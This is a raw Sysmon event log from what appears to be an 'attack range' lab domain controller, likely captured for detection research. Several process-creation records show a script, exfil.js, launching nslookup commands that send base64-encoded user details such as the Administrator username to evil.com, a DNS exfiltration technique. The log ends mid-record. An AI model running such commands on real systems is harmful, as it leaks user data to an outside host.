10341000x8000000000000000202548Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.116{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C7-629A-5441-000000005F02}2800C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202547Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.116{2E1864BB-17C7-629A-5241-000000005F02}72885944C:\Windows\system32\cmd.exe{2E1864BB-17C7-629A-5441-000000005F02}2800C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202546Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.122{2E1864BB-17C7-629A-5441-000000005F02}2800C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C7-629A-5241-000000005F02}7288C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwkscf.tmp 2>&1 10341000x8000000000000000202545Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.085{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C7-629A-5341-000000005F02}2812C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202544Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.085{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C7-629A-5341-000000005F02}2812C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202543Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.085{2E1864BB-17C7-629A-5341-000000005F02}28124288C:\Windows\system32\conhost.exe{2E1864BB-17C7-629A-5241-000000005F02}7288C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202542Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.071{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C7-629A-5341-000000005F02}2812C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202541Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.071{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202540Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.071{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202539Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.071{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202538Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.071{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202537Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.071{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C7-629A-5241-000000005F02}7288C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202536Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.071{2E1864BB-17A1-629A-783D-000000005F02}55527008C:\Windows\System32\WScript.exe{2E1864BB-17C7-629A-5241-000000005F02}7288C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202535Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.076{2E1864BB-17C7-629A-5241-000000005F02}7288C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwkscf.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000202534Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.071{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlmhqpd.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000202533Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.525{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52917- 354300x8000000000000000202532Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.525{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52916- 354300x8000000000000000202531Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.524{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52915- 354300x8000000000000000202530Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.468{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52914- 354300x8000000000000000202529Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.468{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52913- 354300x8000000000000000202528Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.467{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52912- 10341000x8000000000000000202527Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.038{2E1864BB-17C6-629A-5041-000000005F02}7044684C:\Windows\system32\conhost.exe{2E1864BB-17C7-629A-5141-000000005F02}5724C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202526Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.038{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C7-629A-5141-000000005F02}5724C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202525Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.038{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202524Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.038{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202523Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.038{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202522Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.038{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202521Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.038{2E1864BB-17C6-629A-4F41-000000005F02}74047340C:\Windows\system32\cmd.exe{2E1864BB-17C7-629A-5141-000000005F02}5724C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202520Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.038{2E1864BB-17C7-629A-5141-000000005F02}5724C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C6-629A-4F41-000000005F02}7404C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmhqpd.tmp 2>&1 10341000x8000000000000000202519Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.001{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C6-629A-5041-000000005F02}7044C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202518Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.001{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C6-629A-5041-000000005F02}7044C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202517Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.001{2E1864BB-17C6-629A-5041-000000005F02}7044684C:\Windows\system32\conhost.exe{2E1864BB-17C6-629A-4F41-000000005F02}7404C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000043949Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:39.250{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F943FE45E9F706FC6743F0215B2B2167,SHA256=8EC01DB3B1ECDCC7B5D7D785F41191A06E932BAA49967AE04E494B61A47F5905,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000203117Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.976{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C8-629A-8941-000000005F02}5048C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203116Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.961{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203115Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.961{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203114Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 